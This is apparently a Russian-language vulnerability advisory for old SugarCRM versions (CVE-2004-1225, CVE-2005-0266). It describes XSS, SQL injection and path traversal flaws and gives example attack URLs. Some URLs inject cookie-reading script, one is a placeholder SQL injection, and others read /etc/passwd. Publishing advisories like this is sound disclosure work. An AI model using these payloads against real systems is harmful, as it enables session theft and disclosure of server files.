Security Lab

SQL-инъекция в SugarCRM

Дата публикации:06.12.2004
Дата изменения:17.10.2006
Всего просмотров:1511
Опасность:
Средняя
Наличие исправления: Частично
Количество уязвимостей:1
CVE ID: CVE-2004-1225
CVE-2005-0266
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SugarCRM 1.x
Sugar Sales (formerly SugarCRM) 2.x
Уязвимые версии: SugarCRM 2.5 и более ранние версии

Описание:
Обнаружено несколько уязвимостей в SugarCRM. Удаленный атакующий может выполнить произвольный SQL код, произвести XSS нападение и просмотреть произвольные файлы на уязвимой системе.

Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя. Примеры:

/index.php?action=UnifiedSearch&module=Home&search_form=
false&query_string=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

/index.php?module=Accounts&action=ListView&query=true&name=[XSS]

/index.php?action=index&module=Home&mod_strings[LNK_NEW_CONTACT]= %3Cscript%3Ealert(document.cookie)%3C/script%3E

/modules/Users/Error.php?app_strings[NTC_CLICK_BACK]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Удаленный атакующий может выполнить SQL-инъекцию. Уязвимость существует из-за некорректной обработки входных данных в переменной 'record'. Пример:

index.php?action=DetailView&module=Accounts&record=[SQL]

Удаленный атакующий может просмотреть произвольные файлы на уязвимой системе с привилегиями web сервера. Примеры:

/index.php?module=Opportunities&action=../../../../../../../../et c/passwd%00&advanced=true

/index.php?action=DetailView&module=../../../../../etc/passwd%00

URL производителя: www.sugarcrm.com/home/

Решение: Решение не существует на данный момент.

Ссылки: SugarCRM Input Validation Holes Let Remote Users View Files, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks